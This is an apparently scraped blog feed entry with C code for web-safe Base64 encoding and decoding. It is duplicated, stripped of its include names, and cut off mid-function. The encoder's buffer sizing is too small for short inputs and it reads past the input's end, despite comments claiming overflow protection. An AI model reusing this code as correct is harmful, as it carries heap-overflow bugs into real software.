for you :)</p>Web safe Base64 Encode/Decode in C2012-10-29T11:21:00+01:002012-10-29T11:21:00+01:00Nikolai Tschachertag:incolumitas.com,2012-10-29:/2012/10/29/web-safe-base64-encodedecode-in-c/<p>A short while ago I needed to implement a little web safe base64
en/decoder and couldn't find any good small example in the width of the
internet, so I decided to do my own dirty one. I hope I help somebody
with this little demonstration code...</p>
<p>I used Pelles C Compiler to build this program, but I am optimistic that
it works on every common C Compiler, since it's quite close to the C11
standard.</p>
<div class="highlight"><pre><span></span><code><span class="cp">#include </span>
<span class="cp">#include </span>
<span class="cp">#include </span>
<span class="cp">#include</span>
<span class="cp">#define MAX_B64_PADDING 0x2</span>
<span class="cp">#define B64_PAD_CHAR "="</span>
<span class="kt">char</span><span class="w"> </span><span class="o">*</span><span class="w"> </span><span class="nf">Base64Encode</span><span class="p">(</span><span class="kt">char</span><span class="w"> </span><span class="o">*</span><span class="n">input</span><span class="p">,</span><span class="w"> </span><span class="kt">unsigned</span><span class="w"> </span><span class="kt">int</span><span class="w"> </span><span class="n">inputLen</span><span class="p">);</span><span class="w"></span>
<span class="kt">char</span><span class="w"> </span><span class="o">*</span><span class="w"> </span><span class="nf">Base64Decode</span><span class="p">(</span><span class="kt">char</span><span class="w"> </span><span class="o">*</span><span class="n">input</span><span class="p">,</span><span class="w"> </span><span class="kt">unsigned</span><span class="w"> </span><span class="kt">int</span><span class="w"> </span><span class="n">inputLen</span><span class="p">);</span><span class="w"></span>
<span class="k">static</span><span class="w"> </span><span class="kt">unsigned</span><span class="w"> </span><span class="kt">char</span><span class="w"> </span><span class="nf">GetIndexByChar</span><span class="p">(</span><span class="kt">unsigned</span><span class="w"> </span><span class="kt">char</span><span class="w"> </span><span class="n">c</span><span class="p">);</span><span class="w"></span>
<span class="k">static</span><span class="w"> </span><span class="kt">char</span><span class="w"> </span><span class="o">*</span><span class="n">b64alphabet</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="s">"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789-_"</span><span class="p">;</span><span class="w"></span>
<span class="kt">int</span><span class="w"> </span><span class="nf">main</span><span class="p">(</span><span class="kt">int</span><span class="w"> </span><span class="n">argc</span><span class="p">,</span><span class="w"> </span><span class="kt">char</span><span class="w"> </span><span class="o">**</span><span class="n">argv</span><span class="p">)</span><span class="w"> </span><span class="p">{</span><span class="w"></span>
<span class="w"> </span><span class="k">if</span><span class="w"> </span><span class="p">(</span><span class="n">argc</span><span class="w"> </span><span class="o">!=</span><span class="w"> </span><span class="mi">2</span><span class="p">)</span><span class="w"> </span><span class="p">{</span><span class="w"></span>
<span class="w"> </span><span class="n">printf</span><span class="p">(</span><span class="s">"Usage: %s StringToEncode</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span><span class="w"> </span><span class="n">argv</span><span class="p">[</span><span class="mi">0</span><span class="p">]);</span><span class="w"></span>
<span class="w"> </span><span class="n">exit</span><span class="p">(</span><span class="n">EXIT_FAILURE</span><span class="p">);</span><span class="w"></span>
<span class="w"> </span><span class="p">}</span><span class="w"></span>
<span class="w"> </span><span class="n">printf</span><span class="p">(</span><span class="s">"String </span><span class="se">\"</span><span class="s">%s</span><span class="se">\"</span><span class="s"> to: "</span><span class="w"> </span><span class="p">,</span><span class="n">argv</span><span class="p">[</span><span class="mi">1</span><span class="p">]);</span><span class="w"></span>
<span class="w"> </span><span class="n">printf</span><span class="p">(</span><span class="s">"%s</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span><span class="w"> </span><span class="n">Base64Encode</span><span class="p">(</span><span class="n">argv</span><span class="p">[</span><span class="mi">1</span><span class="p">],</span><span class="w"> </span><span class="n">strlen</span><span class="p">(</span><span class="n">argv</span><span class="p">[</span><span class="mi">1</span><span class="p">])));</span><span class="w"></span>
<span class="w"> </span><span class="n">exit</span><span class="p">(</span><span class="n">EXIT_SUCCESS</span><span class="p">);</span><span class="w"></span>
<span class="p">}</span><span class="w"></span>
<span class="cm">/* Caller has to free the returned base64 encoded string ! */</span><span class="w"></span>
<span class="kt">char</span><span class="w"> </span><span class="o">*</span><span class="w"></span>
<span class="nf">Base64Encode</span><span class="p">(</span><span class="kt">char</span><span class="w"> </span><span class="o">*</span><span class="n">input</span><span class="p">,</span><span class="w"> </span><span class="kt">unsigned</span><span class="w"> </span><span class="kt">int</span><span class="w"> </span><span class="n">inputLen</span><span class="p">)</span><span class="w"></span>
<span class="p">{</span><span class="w"></span>
<span class="w"> </span><span class="kt">char</span><span class="w"> </span><span class="o">*</span><span class="n">encodedBuf</span><span class="p">;</span><span class="w"></span>
<span class="w"> </span><span class="kt">int</span><span class="w"> </span><span class="n">fillBytes</span><span class="p">,</span><span class="w"> </span><span class="n">i</span><span class="p">,</span><span class="w"> </span><span class="n">k</span><span class="p">,</span><span class="w"> </span><span class="n">base64StrLen</span><span class="p">;</span><span class="w"></span>
<span class="w"> </span><span class="kt">unsigned</span><span class="w"> </span><span class="kt">char</span><span class="w"> </span><span class="n">a0</span><span class="p">,</span><span class="w"> </span><span class="n">a1</span><span class="p">,</span><span class="w"> </span><span class="n">a2</span><span class="p">,</span><span class="w"> </span><span class="n">a3</span><span class="p">;</span><span class="w"></span>
<span class="w"> </span><span class="cm">/* Make sure there is no overflow. RAM is cheap :) */</span><span class="w"></span>
<span class="w"> </span><span class="n">base64StrLen</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="n">inputLen</span><span class="w"> </span><span class="o">+</span><span class="w"> </span><span class="p">(</span><span class="kt">int</span><span class="p">)(</span><span class="n">inputLen</span><span class="w"> </span><span class="o">*</span><span class="w"> </span><span class="mf">0.45</span><span class="p">);</span><span class="w"></span>
<span class="w"> </span><span class="n">encodedBuf</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="n">calloc</span><span class="p">(</span><span class="n">base64StrLen</span><span class="p">,</span><span class="w"> </span><span class="k">sizeof</span><span class="p">(</span><span class="kt">char …</span></code></pre></div><p>A short while ago I needed to implement a little web safe base64
en/decoder and couldn't find any good small example in the width of the
internet, so I decided to do my own dirty one. I hope I help somebody
with this little demonstration code...</p>
<p>I used Pelles C Compiler to build this program, but I am optimistic that
it works on every common C Compiler, since it's quite close to the C11
standard.</p>
<div class="highlight"><pre><span></span><code><span class="cp">#include </span>
<span class="cp">#include </span>
<span class="cp">#include </span>
<span class="cp">#include</span>
<span class="cp">#define MAX_B64_PADDING 0x2</span>
<span class="cp">#define B64_PAD_CHAR "="</span>
<span class="kt">char</span><span class="w"> </span><span class="o">*</span><span class="w"> </span><span class="nf">Base64Encode</span><span class="p">(</span><span class="kt">char</span><span class="w"> </span><span class="o">*</span><span class="n">input</span><span class="p">,</span><span class="w"> </span><span class="kt">unsigned</span><span class="w"> </span><span class="kt">int</span><span class="w"> </span><span class="n">inputLen</span><span class="p">);</span><span class="w"></span>
<span class="kt">char</span><span class="w"> </span><span class="o">*</span><span class="w"> </span><span class="nf">Base64Decode</span><span class="p">(</span><span class="kt">char</span><span class="w"> </span><span class="o">*</span><span class="n">input</span><span class="p">,</span><span class="w"> </span><span class="kt">unsigned</span><span class="w"> </span><span class="kt">int</span><span class="w"> </span><span class="n">inputLen</span><span class="p">);</span><span class="w"></span>
<span class="k">static</span><span class="w"> </span><span class="kt">unsigned</span><span class="w"> </span><span class="kt">char</span><span class="w"> </span><span class="nf">GetIndexByChar</span><span class="p">(</span><span class="kt">unsigned</span><span class="w"> </span><span class="kt">char</span><span class="w"> </span><span class="n">c</span><span class="p">);</span><span class="w"></span>
<span class="k">static</span><span class="w"> </span><span class="kt">char</span><span class="w"> </span><span class="o">*</span><span class="n">b64alphabet</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="s">"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789-_"</span><span class="p">;</span><span class="w"></span>
<span class="kt">int</span><span class="w"> </span><span class="nf">main</span><span class="p">(</span><span class="kt">int</span><span class="w"> </span><span class="n">argc</span><span class="p">,</span><span class="w"> </span><span class="kt">char</span><span class="w"> </span><span class="o">**</span><span class="n">argv</span><span class="p">)</span><span class="w"> </span><span class="p">{</span><span class="w"></span>
<span class="w"> </span><span class="k">if</span><span class="w"> </span><span class="p">(</span><span class="n">argc</span><span class="w"> </span><span class="o">!=</span><span class="w"> </span><span class="mi">2</span><span class="p">)</span><span class="w"> </span><span class="p">{</span><span class="w"></span>
<span class="w"> </span><span class="n">printf</span><span class="p">(</span><span class="s">"Usage: %s StringToEncode</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span><span class="w"> </span><span class="n">argv</span><span class="p">[</span><span class="mi">0</span><span class="p">]);</span><span class="w"></span>
<span class="w"> </span><span class="n">exit</span><span class="p">(</span><span class="n">EXIT_FAILURE</span><span class="p">);</span><span class="w"></span>
<span class="w"> </span><span class="p">}</span><span class="w"></span>
<span class="w"> </span><span class="n">printf</span><span class="p">(</span><span class="s">"String </span><span class="se">\"</span><span class="s">%s</span><span class="se">\"</span><span class="s"> to: "</span><span class="w"> </span><span class="p">,</span><span class="n">argv</span><span class="p">[</span><span class="mi">1</span><span class="p">]);</span><span class="w"></span>
<span class="w"> </span><span class="n">printf</span><span class="p">(</span><span class="s">"%s</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span><span class="w"> </span><span class="n">Base64Encode</span><span class="p">(</span><span class="n">argv</span><span class="p">[</span><span class="mi">1</span><span class="p">],</span><span class="w"> </span><span class="n">strlen</span><span class="p">(</span><span class="n">argv</span><span class="p">[</span><span class="mi">1</span><span class="p">])));</span><span class="w"></span>
<span class="w"> </span><span class="n">exit</span><span class="p">(</span><span class="n">EXIT_SUCCESS</span><span class="p">);</span><span class="w"></span>
<span class="p">}</span><span class="w"></span>
<span class="cm">/* Caller has to free the returned base64 encoded string ! */</span><span class="w"></span>
<span class="kt">char</span><span class="w"> </span><span class="o">*</span><span class="w"></span>
<span class="nf">Base64Encode</span><span class="p">(</span><span class="kt">char</span><span class="w"> </span><span class="o">*</span><span class="n">input</span><span class="p">,</span><span class="w"> </span><span class="kt">unsigned</span><span class="w"> </span><span class="kt">int</span><span class="w"> </span><span class="n">inputLen</span><span class="p">)</span><span class="w"></span>
<span class="p">{</span><span class="w"></span>
<span class="w"> </span><span class="kt">char</span><span class="w"> </span><span class="o">*</span><span class="n">encodedBuf</span><span class="p">;</span><span class="w"></span>
<span class="w"> </span><span class="kt">int</span><span class="w"> </span><span class="n">fillBytes</span><span class="p">,</span><span class="w"> </span><span class="n">i</span><span class="p">,</span><span class="w"> </span><span class="n">k</span><span class="p">,</span><span class="w"> </span><span class="n">base64StrLen</span><span class="p">;</span><span class="w"></span>
<span class="w"> </span><span class="kt">unsigned</span><span class="w"> </span><span class="kt">char</span><span class="w"> </span><span class="n">a0</span><span class="p">,</span><span class="w"> </span><span class="n">a1</span><span class="p">,</span><span class="w"> </span><span class="n">a2</span><span class="p">,</span><span class="w"> </span><span class="n">a3</span><span class="p">;</span><span class="w"></span>
<span class="w"> </span><span class="cm">/* Make sure there is no overflow. RAM is cheap :) */</span><span class="w"></span>
<span class="w"> </span><span class="n">base64StrLen</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="n">inputLen</span><span class="w"> </span><span class="o">+</span><span class="w"> </span><span class="p">(</span><span class="kt">int</span><span class="p">)(</span><span class="n">inputLen</span><span class="w"> </span><span class="o">*</span><span class="w"> </span><span class="mf">0.45</span><span class="p">);</span><span class="w"></span>
<span class="w"> </span><span class="n">encodedBuf</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="n">calloc</span><span class="p">(</span><span class="n">base64StrLen</span><span class="p">,</span><span class="w"> </span><span class="k">sizeof</span><span class="p">(</span><span class="kt">char</span><span class="p">));</span><span class="w"></span>
<span class="w"> </span><span class="k">if</span><span class="w"> </span><span class="p">(</span><span class="n">encodedBuf</span><span class="w"> </span><span class="o">==</span><span class="w"> </span><span class="nb">NULL</span><span class="p">)</span><span class="w"> </span><span class="p">{</span><span class="w"></span>
<span class="w"> </span><span class="n">printf</span><span class="p">(</span><span class="s">"calloc() failed with error %d</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span><span class="w"> </span><span class="n">errno</span><span class="p">);</span><span class="w"></span>
<span class="w"> </span><span class="k">return</span><span class="w"> </span><span class="nb">NULL</span><span class="p">;</span><span class="w"></span>
<span class="w"> </span><span class="p">}</span><span class="w"></span>
<span class="w"> </span><span class="n">fillBytes</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="mi">3</span><span class="w"> </span><span class="o">-</span><span class="w"> </span><span class="p">(</span><span class="n">inputLen</span><span class="w"> </span><span class="o">%</span><span class="w"> </span><span class="mi">3</span><span class="p">);</span><span class="w"> </span><span class="cm">/* Pad until dividable by 3 ! */</span><span class="w"></span>
<span class="w"> </span><span class="n">k</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="mi">0</span><span class="p">;</span><span class="w"></span>
<span class="w"> </span><span class="cm">/* Walk in 3 byte steps*/</span><span class="w"></span>
<span class="w"> </span><span class="k">for</span><span class="w"> </span><span class="p">(</span><span class="n">i</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="mi">0</span><span class="p">;</span><span class="w"> </span><span class="n">i</span><span class="w"> </span><span class="o"><</span><span class="w"> </span><span class="n">inputLen</span><span class="p">;</span><span class="w"> </span><span class="n">i</span><span class="w"> </span><span class="o">+=</span><span class="w"> </span><span class="mi">3</span><span class="p">)</span><span class="w"> </span><span class="p">{</span><span class="w"></span>
<span class="w"> </span><span class="n">a0</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="p">(</span><span class="kt">unsigned</span><span class="w"> </span><span class="kt">char</span><span class="p">)(((</span><span class="n">input</span><span class="p">[</span><span class="n">i</span><span class="o">+</span><span class="mi">0</span><span class="p">]</span><span class="w"> </span><span class="o">&</span><span class="w"> </span><span class="mh">0xFC</span><span class="p">)</span><span class="w"> </span><span class="o">>></span><span class="w"> </span><span class="mi">2</span><span class="p">));</span><span class="w"></span>
<span class="w"> </span><span class="n">a1</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="p">(</span><span class="kt">unsigned</span><span class="w"> </span><span class="kt">char</span><span class="p">)(((</span><span class="n">input</span><span class="p">[</span><span class="n">i</span><span class="o">+</span><span class="mi">0</span><span class="p">]</span><span class="w"> </span><span class="o">&</span><span class="w"> </span><span class="mh">0x3</span><span class="p">)</span><span class="w"> </span><span class="o"><<</span><span class="w"> </span><span class="mi">4</span><span class="p">)</span><span class="w"> </span><span class="o">+</span><span class="w"> </span><span class="p">((</span><span class="n">input</span><span class="p">[</span><span class="n">i</span><span class="o">+</span><span class="mi">1</span><span class="p">]</span><span class="w"> </span><span class="o">&</span><span class="w"> </span><span class="mh">0xF0</span><span class="p">)</span><span class="w"> </span><span class="o">>></span><span class="w"> </span><span class="mi">4</span><span class="p">));</span><span class="w"></span>
<span class="w"> </span><span class="n">a2</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="p">(</span><span class="kt">unsigned</span><span class="w"> </span><span class="kt">char</span><span class="p">)(((</span><span class="n">input</span><span class="p">[</span><span class="n">i</span><span class="o">+</span><span class="mi">1</span><span class="p">]</span><span class="w"> </span><span class="o">&</span><span class="w"> </span><span class="mh">0xF</span><span class="p">)</span><span class="w"> </span><span class="o"><<</span><span class="w"> </span><span class="mi">2</span><span class="p">)</span><span class="w"> </span><span class="o">+</span><span class="w"> </span><span class="p">((</span><span class="n">input</span><span class="p">[</span><span class="n">i</span><span class="o">+</span><span class="mi">2</span><span class="p">]</span><span class="w"> </span><span class="o">&</span><span class="w"> </span><span class="mh">0xC0</span><span class="p">)</span><span class="w"> </span><span class="o">>></span><span class="w"> </span><span class="mi">6</span><span class="p">));</span><span class="w"></span>
<span class="w"> </span><span class="n">a3</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="p">(</span><span class="kt">unsigned</span><span class="w"> </span><span class="kt">char</span><span class="p">)((</span><span class="n">input</span><span class="p">[</span><span class="n">i</span><span class="o">+</span><span class="mi">2</span><span class="p">]</span><span class="w"> </span><span class="o">&</span><span class="w"> </span><span class="mh">0x3F</span><span class="p">));</span><span class="w"></span>
<span class="w"> </span><span class="n">encodedBuf</span><span class="p">[</span><span class="n">k</span><span class="o">+</span><span class="mi">0</span><span class="p">]</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="n">b64alphabet</span><span class="p">[</span><span class="n">a0</span><span class="p">];</span><span class="w"></span>
<span class="w"> </span><span class="n">encodedBuf</span><span class="p">[</span><span class="n">k</span><span class="o">+</span><span class="mi">1</span><span class="p">]</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="n">b64alphabet</span><span class="p">[</span><span class="n">a1</span><span class="p">];</span><span class="w"></span>
<span class="w"> </span><span class="n">encodedBuf</span><span class="p">[</span><span class="n">k</span><span class="o">+</span><span class="mi">2</span><span class="p">]</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="n">b64alphabet</span><span class="p">[</span><span class="n">a2</span><span class="p">];</span><span class="w"></span>
<span class="w"> </span><span class="n">encodedBuf</span><span class="p">[</span><span class="n">k</span><span class="o">+</span><span class="mi">3</span><span class="p">]</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="n">b64alphabet</span><span class="p">[</span><span class="n">a3</span><span class="p">];</span><span class="w"></span>
<span class="w"> </span><span class="cm">/* Prevents buffer overflow */</span><span class="w"></span>
<span class="w"> </span><span class="k">if</span><span class="w"> </span><span class="p">(</span><span class="n">i</span><span class="w"> </span><span class="o">+</span><span class="w"> </span><span class="p">(</span><span class="mi">3</span><span class="w"> </span><span class="o">-</span><span class="w"> </span><span class="n">fillBytes</span><span class="p">)</span><span class="w"> </span><span class="o">==</span><span class="w"> </span><span class="n">inputLen</span><span class="p">)</span><span class="w"> </span><span class="p">{</span><span class="w"> </span><span class="cm">/* Check if we pad */</span><span class="w"></span>
<span class="w"> </span><span class="cm">/* fill byte is either 0, 1 or 2 */</span><span class="w"></span>
<span class="w"> </span><span class="k">switch</span><span class="w"> </span><span class="p">(</span><span class="n">fillBytes</span><span class="p">)</span><span class="w"> </span><span class="p">{</span><span class="w"></span>
<span class="w"> </span><span class="k">case</span><span class="w"> </span><span class="mi">0</span><span class="o">:</span><span class="w"> </span><span class="c1">// do nothing</span>
<span class="w"> </span><span class="k">break</span><span class="p">;</span><span class="w"></span>
<span class="w"> </span><span class="k">case</span><span class="w"> </span><span class="mi">1</span><span class="o">:</span><span class="w"> </span><span class="c1">// last encoded byte becomes pad value</span>
<span class="w"> </span><span class="n">encodedBuf</span><span class="p">[</span><span class="n">k</span><span class="o">+</span><span class="mi">3</span><span class="p">]</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="o">*</span><span class="n">B64_PAD_CHAR</span><span class="p">;</span><span class="w"></span>
<span class="w"> </span><span class="k">break</span><span class="p">;</span><span class="w"></span>
<span class="w"> </span><span class="k">case</span><span class="w"> </span><span class="mi">2</span><span class="o">:</span><span class="w"> </span><span class="c1">// last two encoded bytes become pad value</span>
<span class="w"> </span><span class="n">encodedBuf</span><span class="p">[</span><span class="n">k</span><span class="o">+</span><span class="mi">2</span><span class="p">]</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="o">*</span><span class="n">B64_PAD_CHAR</span><span class="p">;</span><span class="w"></span>
<span class="w"> </span><span class="n">encodedBuf</span><span class="p">[</span><span class="n">k</span><span class="o">+</span><span class="mi">3</span><span class="p">]</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="o">*</span><span class="n">B64_PAD_CHAR</span><span class="p">;</span><span class="w"></span>
<span class="w"> </span><span class="k">break</span><span class="p">;</span><span class="w"></span>
<span class="w"> </span><span class="p">}</span><span class="w"></span>
<span class="w"> </span><span class="p">}</span><span class="w"></span>
<span class="w"> </span><span class="n">k</span><span class="w"> </span><span class="o">+=</span><span class="w"> </span><span class="mi">4</span><span class="p">;</span><span class="w"></span>
<span class="w"> </span><span class="p">}</span><span class="w"></span>
<span class="w"> </span><span class="k">return</span><span class="w"> </span><span class="n">encodedBuf</span><span class="p">;</span><span class="w"></span>
<span class="p">}</span><span class="w"></span>
<span class="cm">/* Caller has to free the returned decoded ascii buffer */</span><span class="w"></span>
<span class="kt">char</span><span class="w"> </span><span class="o">*</span><span class="w"> </span>
<span class="nf">Base64Decode</span><span class="p">(</span><span class="kt">char</span><span class="w"> </span><span class="o">*</span><span class="n">input</span><span class="p">,</span><span class="w"> </span><span class="kt">unsigned</span><span class="w"> </span><span class="kt">int</span><span class="w"> </span><span class="n">inputLen</span><span class="p">)</span><span class="w"></span>
<span class="p">{</span><span class="w"></span>
<span class="w"> </span><span class="kt">char</span><span class="w"> </span><span class="o">*</span><span class="w"> </span><span class="n">decodedBuf</span><span class="p">;</span><span class="w"></span>
<span class="w"> </span><span class="kt">char</span><span class="w"> </span><span class="n">a0</span><span class="p">,</span><span class="w"> </span><span class="n">a1</span><span class="p">,</span><span class="w"> </span><span class="n">a2</span><span class="p">,</span><span class="w"> </span><span class="n">a3</span><span class="p">;</span><span class="w"></span>
<span class="w"> </span><span class="kt">int</span><span class="w"> </span><span class="n">i</span><span class="p">,</span><span class="w"> </span><span class="n">k</span><span class="p">,</span><span class="w"> </span><span class="n">decodedLen</span><span class="p">;</span><span class="w"></span>
<span class="w"> </span><span class="n">decodedLen</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="p">(</span><span class="kt">int</span><span class="p">)(</span><span class="n">inputLen</span><span class="w"> </span><span class="o">*</span><span class="w"> </span><span class="mf">0.8</span><span class="p">);</span><span class="w"> </span><span class="c1">// 20 % less big than b64 encoded should be more than enough</span>
<span class="w"> </span><span class="n">decodedBuf</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="n">calloc</span><span class="p">(</span><span class="n">decodedLen</span><span class="p">,</span><span class="w"> </span><span class="k">sizeof</span><span class="p">(</span><span class="kt">char</span><span class="p">));</span><span class="w"></span>
<span class="w"> </span><span class="k">if</span><span class="w"> </span><span class="p">(</span><span class="n">decodedBuf</span><span class="w"> </span><span class="o">==</span><span class="w"> </span><span class="nb">NULL</span><span class="p">)</span><span class="w"> </span><span class="p">{</span><span class="w"></span>
<span class="w"> </span><span class="n">printf</span><span class="p">(</span><span class="s">"calloc() failed with error %d</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span><span class="w"> </span><span class="n">errno</span><span class="p">);</span><span class="w"></span>
<span class="w"> </span><span class="k">return</span><span class="w"> </span><span class="nb">NULL</span><span class="p">;</span><span class="w"></span>
<span class="w"> </span><span class="p">}</span><span class="w"></span>
<span class="w"> </span><span class="n">k</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="mi">0</span><span class="p">;</span><span class="w"></span>
<span class="w"> </span><span class="k">for</span><span class="w"> </span><span class="p">(</span><span class="n">i</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="mi">0</span><span class="p">;</span><span class="w"> </span><span class="n">i</span><span class="w"> </span><span class="o"><</span><span class="w"> </span><span class="n">inputLen</span><span class="p">;</span><span class="w"> </span><span class="n">i</span><span class="w"> </span><span class="o">+=</span><span class="w"> </span><span class="mi">4</span><span class="p">)</span><span class="w"> </span><span class="p">{</span><span class="w"></span>
<span class="w"> </span><span class="k">if</span><span class="w"> </span><span class="p">((</span><span class="n">i</span><span class="w"> </span><span class="o">+</span><span class="w"> </span><span class="mi">4</span><span class="p">)</span><span class="w"> </span><span class="o"><=</span><span class="w"> </span><span class="n">inputLen</span><span class="p">)</span><span class="w"> </span><span class="p">{</span><span class="w"></span>
<span class="w"> </span><span class="n">a0</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="n">GetIndexByChar</span><span class="p">(</span><span class="n">input</span><span class="p">[</span><span class="n">i</span><span class="o">+</span><span class="mi">0</span><span class="p">]);</span><span class="w"></span>
<span class="w"> </span><span class="n">a1</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="n">GetIndexByChar</span><span class="p">(</span><span class="n">input</span><span class="p">[</span><span class="n">i</span><span class="o">+</span><span class="mi">1</span><span class="p">]);</span><span class="w"></span>
<span class="w"> </span><span class="n">a2</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="n">GetIndexByChar</span><span class="p">(</span><span class="n">input</span><span class="p">[</span><span class="n">i</span><span class="o">+</span><span class="mi">2</span><span class="p">]);</span><span class="w"></span>
<span class="w"> </span><span class="n">a3</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="n">GetIndexByChar</span><span class="p">(</span><span class="n">input</span><span class="p">[</span><span class="n">i</span><span class="o">+</span><span class="mi">3</span><span class="p">]);</span><span class="w"></span>
<span class="w"> </span><span class="n">decodedBuf</span><span class="p">[</span><span class="n">k</span><span class="o">+</span><span class="mi">0</span><span class="p">]</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="p">(</span><span class="kt">char</span><span class="p">)((</span><span class="n">a0</span><span class="w"> </span><span class="o"><<</span><span class="w"> </span><span class="mi">2</span><span class="p">)</span><span class="w"> </span><span class="o">+</span><span class="w"> </span><span class="p">((</span><span class="n">a1</span><span class="w"> </span><span class="o">&</span><span class="w"> </span><span class="mh">0x30</span><span class="p">)</span><span class="w"> </span><span class="o">>></span><span class="w"> </span><span class="mi">4</span><span class="p">));</span><span class="w"></span>
<span class="w"> </span><span class="n">decodedBuf</span><span class="p">[</span><span class="n">k</span><span class="o">+</span><span class="mi">1</span><span class="p">]</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="p">(</span><span class="kt">char</span><span class="p">)(((</span><span class="n">a1</span><span class="w"> </span><span class="o">&</span><span class="w"> </span><span class="mh">0xF</span><span class="p">)</span><span class="w"> </span><span class="o"><<</span><span class="w"> </span><span class="mi">4</span><span class="p">)</span><span class="w"> </span><span class="o">+</span><span class="w"> </span><span class="p">((</span><span class="n">a2</span><span class="w"> </span><span class="o">&</span><span class="w"> </span><span class="mh">0x3C</span><span class="p">)</span><span class="w"> </span><span class="o">>></span><span class="w"> </span><span class="mi">2</span><span class="p">));</span><span class="w"></span>
<span class="w"> </span><span class="n">decodedBuf</span><span class="p">[</span><span class="n">k</span><span class="o">+</span><span class="mi">2</span><span class="p">]</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="p">(</span><span class="kt">char</span><span class="p">)(((</span><span class="n">a2</span><span class="w"> </span><span class="o">&</span><span class="w"> </span><span class="mh">0x3</span><span class="p">)</span><span class="w"> </span><span class="o"><<</span><span class="w"> </span><span class="mi">6</span><span class="p">)</span><span class="w"> </span><span class="o">+</span><span class="w"> </span><span class="p">(</span><span class="n">a3</span><span class="p">));</span><span class="w"></span>
<span class="w"> </span><span class="cm">/* Strip pad bytes. Ugly, but working solution... */</span><span class="w"></span>
<span class="w"> </span><span class="k">if</span><span class="w"> </span><span class="p">(</span><span class="n">a0</span><span class="w"> </span><span class="o">==</span><span class="w"> </span><span class="mi">100</span><span class="p">)</span><span class="w"> </span><span class="p">{</span><span class="w"></span>
<span class="w"> </span><span class="n">decodedBuf</span><span class="p">[</span><span class="n">k</span><span class="o">+</span><span class="mi">0</span><span class="p">]</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="sc">'\0'</span><span class="p">;</span><span class="w"></span>
<span class="w"> </span><span class="k">break</span><span class="p">;</span><span class="w"></span>
<span class="w"> </span><span class="p">}</span><span class="w"> </span><span class="k">else</span><span class="w"> </span><span class="k">if</span><span class="w"> </span><span class="p">(</span><span class="n">a1</span><span class="w"> </span><span class="o">==</span><span class="w"> </span><span class="mi">100</span><span class="p">)</span><span class="w"> </span><span class="p">{</span><span class="w"></span>
<span class="w"> </span><span class="n">decodedBuf</span><span class="p">[</span><span class="n">k</span><span class="o">+</span><span class="mi">0</span><span class="p">]</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="sc">'\0'</span><span class="p">;</span><span class="w"></span>
<span class="w"> </span><span class="k">break</span><span class="p">;</span><span class="w"></span>
<span class="w"> </span><span class="p">}</span><span class="w"> </span><span class="k">else</span><span class="w"> </span><span class="k">if</span><span class="w"> </span><span class="p">(</span><span class="n">a2</span><span class="w"> </span><span class="o">==</span><span class="w"> </span><span class="mi">100</span><span class="p">)</span><span class="w"> </span><span class="p">{</span><span class="w"></span>
<span class="w"> </span><span class="n">decodedBuf</span><span class="p">[</span><span class="n">k</span><span class="o">+</span><span class="mi">1</span><span class="p">]</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="sc">'\0'</span><span class="p">;</span><span class="w"></span>
<span class="w"> </span><span class="k">break</span><span class="p">;</span><span class="w"></span>
<span class="w"> </span><span class="p">}</span><span class="w"> </span><span class="k">else</span><span class="w"> </span><span class="k">if</span><span class="w"> </span><span class="p">(</span><span class="n">a3</span><span class="w"> </span><span class="o">==</span><span class="w"> </span><span class="mi">100</span><span class="p">)</span><span class="w"> </span><span class="p">{</span><span class="w"></span>
<span class="w"> </span><span class="n">decodedBuf</span><span class="p">[</span><span class="n">k</span><span class="o">+</span><span class="mi">2</span><span class="p">]</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="sc">'\0'</span><span class="p">;</span><span class="w"></span>
<span class="w"> </span><span class="k">break</span><span class="p">;</span><span class="w"></span>
<span class="w"> </span><span class="p">}</span><span class="w"></span>
<span class="w"> </span><span class="n">k</span><span class="w"> </span><span class="o">+=</span><span class="w"> </span><span class="mi">3</span><span class="p">;</span><span class="w"></span>
<span class="w"> </span><span class="p">}</span><span class="w"></span>
<span class="w"> </span><span class="p">}</span><span class="w"></span>
